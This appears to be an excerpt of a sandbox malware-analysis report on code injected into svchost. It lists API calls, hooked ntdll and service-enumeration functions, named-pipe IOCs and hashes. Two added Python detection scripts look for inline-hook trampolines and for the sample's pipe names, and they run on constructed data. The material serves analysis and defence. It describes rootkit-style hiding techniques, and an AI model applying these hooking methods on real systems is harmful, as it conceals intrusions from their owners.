                                                                                  • Part of subcall function 00000257E10A1628: HeapAlloc.KERNEL32 ref: 00000257E10A1642
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16B2
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16DF
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A16F9
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1719
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1734
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1754
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A176F
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A178F
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17AA
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A17CA
                                                                                • Sleep.KERNEL32 ref: 00000257E10A1AD7
                                                                                • SleepEx.KERNELBASE ref: 00000257E10A1ADD
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17E5
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1805
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1820
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1840
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A185B
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A187B
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1896
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A18A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: d712d7bd41ce4f32cb42d1788969e2e1ab98e8c502d066c5c5fdd1db537eb6f4
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 9F31F871298F4582FF5E9726FE4B3E923A4AB44BC2F0858615E0987695FF34C451C228

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered graph not reproduced): basic blocks 257e107273c-257e10729d0, calling LoadLibraryA, with subcalls to 257e10729d4.
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: e1821c6af69327561f239fb501c7fdcfb84665abf8bb743926d129d5342e2f1a
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 4E617572B49B9087DB5AEF14E80B73DB3A2F744BE5F188161DE4903788CA78D852C704

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered graph not reproduced): basic blocks 257e10a2b2c-257e10a2f03, calling GetModuleHandleA, StrCmpNIW and lstrlenW, with subcalls to 257e10c2ce0, 257e10b6090, 257e10a199c, 257e10a1bbc, 257e10a3844, 257e10a152c and 257e10a85c0.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: a05134c9a34ff4c1d66afd38e5ef54d71b3b96099cc726008d15654598d14383
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: 3BB1D032258F5482EB6EDF25EC4B7A963A5F744B86F0450A6EE0953B95DF34CC80C398
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: 219ced55679ac893985f66a80f0dbd7178f5651cf27174fbf386b8ec505e6a56
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 29314A72249F808AEB65DF60F8867EE7360F784745F44802ADA4E57B98EF38C648C714
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 3bbfa850ad8dbd0e4a6fa2243018912ee9c80721fc4e2599e2c74e45bb328308
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 1531AD32258F8086EB69CF25FC467AE73A0F789755F504166EA9D43B98EF38C145CB04

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: eced55502f1a75a026b6edf846e6a0891afcc2511a2fde73ec7a25957e053ce4
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 39517C32248F8486EB59CF66F84A75A77A1F389F8AF088524DE5907718DF3CC049C704

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 729b3f40a99a6114c8675349f500bf02ad9969b64215182506dd6b7d13de966c
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 6C319574298F4AE1EA0FEFA5FCABBD46325B75434BF8054A3940902576DF3C8249C768
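
The string list in this function (ntdll.dll, advapi32.dll, sechost.dll and the Nt*/EnumService* names) is the set of exports the code resolves with GetProcAddress before patching their prologues; the NtQueryDirectoryFile*, NtEnumerateKey/NtEnumerateValueKey, NtQuerySystemInformation and EnumServicesStatusExW entries match the file, registry, process and service hiding reported for this sample. The check below is an added example, not code from the report or from the sample: it classifies the first bytes of each ntdll export against the clean x64 syscall-stub prologue (mov r10, rcx / mov eax, ssn) and resolves where a detected trampoline lands. Reading the bytes out of a live process needs ReadProcessMemory and is Windows-only, so it is left out; the stub bytes, image base and hook targets are constructed for illustration. EnumServiceGroupW and EnumServicesStatusExW are not syscall stubs and would have to be compared against the on-disk advapi32/sechost image instead.

```python
"""Inline-hook check for x64 ntdll syscall stubs (added example, not from the report).

Feed scan_stubs() a mapping of export name -> (virtual address, first bytes) taken
from a suspect process. Stub bytes and addresses below are constructed.
"""
import struct
from typing import Dict, List, Optional, Tuple

# ntdll exports from the hooked-function string list. Only these share the uniform
# syscall-stub prologue; EnumServiceGroupW / EnumServicesStatusExW are advapi32/sechost
# exports and must be compared against the on-disk image instead.
NTDLL_HOOK_TARGETS = [
    "NtDeviceIoControlFile", "NtEnumerateKey", "NtEnumerateValueKey",
    "NtQueryDirectoryFile", "NtQueryDirectoryFileEx",
    "NtQuerySystemInformation", "NtResumeThread",
]

# Clean x64 stub on Windows 10/11:  4C 8B D1 = mov r10, rcx ; B8 xx xx 00 00 = mov eax, <ssn>
CLEAN_PREFIX = bytes.fromhex("4C8BD1B8")
MASK64 = 0xFFFFFFFFFFFFFFFF


def classify_prologue(code: bytes) -> str:
    """Return 'clean' or the trampoline type found at the start of a stub."""
    if len(code) >= 8 and code.startswith(CLEAN_PREFIX) and code[6:8] == b"\x00\x00":
        return "clean"
    if len(code) >= 5 and code[0] == 0xE9:                                   # jmp rel32
        return "jmp_rel32"
    if len(code) >= 6 and code[:2] == b"\xFF\x25":                           # jmp qword ptr [rip+disp32]
        return "jmp_rip_indirect"
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":  # mov rax, imm64 ; jmp rax
        return "mov_rax_jmp"
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:               # push imm32 ; ret
        return "push_ret"
    return "unknown"


def hook_target(stub_va: int, code: bytes) -> Optional[int]:
    """Resolve where a trampoline transfers control, when it can be computed statically."""
    kind = classify_prologue(code)
    if kind == "jmp_rel32":
        rel = struct.unpack("<i", code[1:5])[0]
        return (stub_va + 5 + rel) & MASK64
    if kind == "mov_rax_jmp":
        return struct.unpack("<Q", code[2:10])[0]
    if kind == "push_ret":
        return struct.unpack("<i", code[1:5])[0] & MASK64        # push sign-extends imm32
    return None  # jmp [rip+disp32] needs the pointer slot's contents, not available here


def scan_stubs(stubs: Dict[str, Tuple[int, bytes]],
               module_range: Tuple[int, int]) -> List[Tuple[str, str, Optional[int], bool]]:
    """Report every non-clean stub as (name, kind, target, target_outside_ntdll)."""
    lo, hi = module_range
    findings = []
    for name, (va, code) in stubs.items():
        kind = classify_prologue(code)
        if kind == "clean":
            continue
        target = hook_target(va, code)
        outside = target is not None and not (lo <= target < hi)
        findings.append((name, kind, target, outside))
    return findings


# ---- constructed sample data (not taken from the report) ----
NTDLL_BASE = 0x7FFA12340000
NTDLL_RANGE = (NTDLL_BASE, NTDLL_BASE + 0x1F0000)
INJECTED_REGION = 0x7FFA00000000        # stand-in for an unbacked RWX allocation


def make_clean_stub(ssn: int) -> bytes:
    """mov r10, rcx ; mov eax, ssn ; syscall ; ret  (tail simplified)."""
    return CLEAN_PREFIX + struct.pack("<I", ssn) + bytes.fromhex("0F05C3")


def make_jmp_rel32(stub_va: int, target: int) -> bytes:
    return b"\xE9" + struct.pack("<i", target - (stub_va + 5)) + b"\x90\x90\x90"


def make_mov_rax_jmp(target: int) -> bytes:
    return b"\x48\xB8" + struct.pack("<Q", target) + b"\xFF\xE0"


SAMPLE_STUBS = {
    "NtQueryDirectoryFile":     (NTDLL_BASE + 0x9D2A0, make_clean_stub(0x35)),
    "NtQuerySystemInformation": (NTDLL_BASE + 0x9D1A0,
                                 make_jmp_rel32(NTDLL_BASE + 0x9D1A0, INJECTED_REGION)),
    "NtEnumerateKey":           (NTDLL_BASE + 0x9D4E0, make_mov_rax_jmp(0x257E10A3000)),
    "NtResumeThread":           (NTDLL_BASE + 0x9D560, make_clean_stub(0x52)),
}

if __name__ == "__main__":
    for name, kind, target, outside in scan_stubs(SAMPLE_STUBS, NTDLL_RANGE):
        where = f"0x{target:X}" if target is not None else "?"
        print(f"{name}: {kind} -> {where}{'  (outside ntdll)' if outside else ''}")
```

A target outside the ntdll image range is the strongest signal: a legitimate hot-patch or EDR hook also rewrites the prologue, so the destination region (image-backed or not, which module) is what separates this sample's hooks from benign instrumentation.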

                                                                                Control-flow Graph

• Control-flow graph: rendered as an image in the original report (executed and not-executed basic blocks colour-coded); the exported node/edge list is omitted here. Entry basic block: 257e1076910.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: c413f792152c6e77bcdec011d4ce604bdbff46f8c7e2d41a41648d6f97dd56db
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 7481476178CF0586F65FBB2ABC4F3B922D0E785782F5480A49A2647797DB38C8458B0C

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000257E10ACE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEBC
                                                                                • SetLastError.KERNEL32 ref: 00000257E10ACED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000257E10AECCC,?,?,?,?,00000257E10ABF9F,?,?,?,?,?,00000257E10A7AB0), ref: 00000257E10ACF2C
                                                                                  • Part of subcall function 00000257E10AD6CC: HeapAlloc.KERNEL32 ref: 00000257E10AD721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF54
                                                                                  • Part of subcall function 00000257E10AD744: HeapFree.KERNEL32 ref: 00000257E10AD75A
                                                                                  • Part of subcall function 00000257E10AD744: GetLastError.KERNEL32 ref: 00000257E10AD764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 44b74c0836ad876a2fac46d0e824247e53a8591ac7bd446e8d08f2f1267c89cf
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 3D4182703CDF4441FAAFA7357E5F3AD22815B447B2F6547A4A936066D6DE38C401872C

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: fd144254930c9193e2e316754b6910d439631fa1b8b54bcb3ad30ea55ac0c1ae
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: DB214F32658F4082FB19CB25F84A75A73A0F789BA6F504255EA6903BA8CF3CC149CF04
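
This function combines CreateProcess, Wow64 and pipe Read/Write APIs with the two pipe names `\\.\pipe\dialerchildproc32` and `\\.\pipe\dialerchildproc64`, so the suffix appears to be chosen by the child's bitness and the pipe carries data between the parent and the spawned child (an inference from the API list, not something the report states). Those two names are a usable host IOC. The following is an added detection example, not part of the report: it parses Sysmon pipe events (ID 17, Pipe Created, and ID 18, Pipe Connected), where Sysmon records the name without the `\\.\pipe\` prefix, and flags both variants. The event records are constructed for illustration; the field names follow the Sysmon schema.

```python
"""Flag the sample's named pipes in Sysmon pipe events (added example, not from the report).

Sysmon logs \\.\pipe\dialerchildproc64 as PipeName "\dialerchildproc64".
The events below are constructed; only the field names are real Sysmon fields.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

PIPE_EVENT_IDS = {"17": "PipeCreated", "18": "PipeConnected"}

# Both names from the string list, with the \\.\pipe\ prefix stripped the way Sysmon logs them.
SUSPECT_PIPE = re.compile(r"^\\dialerchildproc(32|64)$", re.IGNORECASE)


def parse_event(xml_text: str) -> Dict[str, str]:
    """Flatten one Sysmon <Event> into a dict of EventID plus every <Data Name=...> field."""
    root = ET.fromstring(xml_text)
    out: Dict[str, str] = {}
    for el in root.iter():
        tag = el.tag.split("}")[-1]              # drop the Event schema namespace if present
        if tag == "EventID":
            out["EventID"] = (el.text or "").strip()
        elif tag == "Data" and el.get("Name"):
            out[el.get("Name")] = (el.text or "").strip()
    return out


def find_suspect_pipes(events: List[str]) -> List[Dict[str, str]]:
    """Return one hit per pipe event whose PipeName matches the sample's two names."""
    hits = []
    for raw in events:
        ev = parse_event(raw)
        if ev.get("EventID") not in PIPE_EVENT_IDS:
            continue                              # not a pipe event
        if SUSPECT_PIPE.match(ev.get("PipeName", "")):
            hits.append({
                "type": PIPE_EVENT_IDS[ev["EventID"]],
                "pipe": ev["PipeName"],
                "image": ev.get("Image", ""),
                "pid": ev.get("ProcessId", ""),
                "time": ev.get("UtcTime", ""),
            })
    return hits


# ---- constructed sample events (not taken from the report) ----
def _event(event_id: int, utc: str, pid: int, pipe: str, image: str) -> str:
    event_type = "CreatePipe" if event_id == 17 else "ConnectPipe"
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>{event_id}</EventID></System>
  <EventData>
    <Data Name="EventType">{event_type}</Data>
    <Data Name="UtcTime">{utc}</Data>
    <Data Name="ProcessId">{pid}</Data>
    <Data Name="PipeName">{pipe}</Data>
    <Data Name="Image">{image}</Data>
  </EventData>
</Event>"""


SAMPLE_EVENTS = [
    _event(17, "2025-01-01 10:00:00.000", 5124, r"\dialerchildproc64", r"C:\Users\Public\file.exe"),
    _event(17, "2025-01-01 10:00:01.000", 900,  r"\lsass",             r"C:\Windows\System32\lsass.exe"),
    _event(18, "2025-01-01 10:00:02.000", 6180, r"\dialerchildproc64", r"C:\Windows\System32\svchost.exe"),
    _event(17, "2025-01-01 10:00:03.000", 6180, r"\DIALERCHILDPROC32", r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for hit in find_suspect_pipes(SAMPLE_EVENTS):
        print(f"{hit['time']} {hit['type']:13} pid={hit['pid']:<6} {hit['pipe']}  {hit['image']}")
```

A fixed pipe name is a brittle IOC (the string can change between builds), so pair it with a behavioural rule such as a pipe created by a process that was itself spawned from a user-writable path, which the same event fields support.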

                                                                                Control-flow Graph

• Control-flow graph: rendered as an image in the original report (executed and not-executed basic blocks colour-coded); the exported node/edge list is omitted here. Entry basic block: 257e10aa544.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: fa66f7741ebcd80bb86e54b7b1d1724f64a0d38ed48e78e569a20c50e363ff0f
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 46E1E572648F40CAEB6ADF65E84B39D77A0F748B99F100155EE8957B95CF34C081C714

                                                                                Control-flow Graph

• Control-flow graph: rendered as an image in the original report (executed and not-executed basic blocks colour-coded); the exported node/edge list is omitted here. Entry basic block: 257e1079944.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: eee8ddbebd137ff77ed4dfc8451c6d54f91bdde69a51e284d5195fa703101059
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: FFE1E472648F408AEB6AFF65E88B3AD37B0F7457A9F000156EE4A57B55CB34C490C704

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: cf054b1d2baf678fe8bdec6d8eaa147d53923dc8430d7e3ded5bb42e28665e5b
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 2741C632399F0091FA1FDB16BC0B79A2391B745BE1F5942659D1E87784EF3CC4458328

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 9cf63d37dc8258112caa738864d3c548755d6f27b2a305309498d83b3183a8b3
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 27419F73218F84C6E765CF21F84A79E77A1F388B89F048129EA8907B58DF38D449CB14

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 3937cb81b8b0f971906db0413d64368154e2d1c9df82cae5cad0a14440eaf12d
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
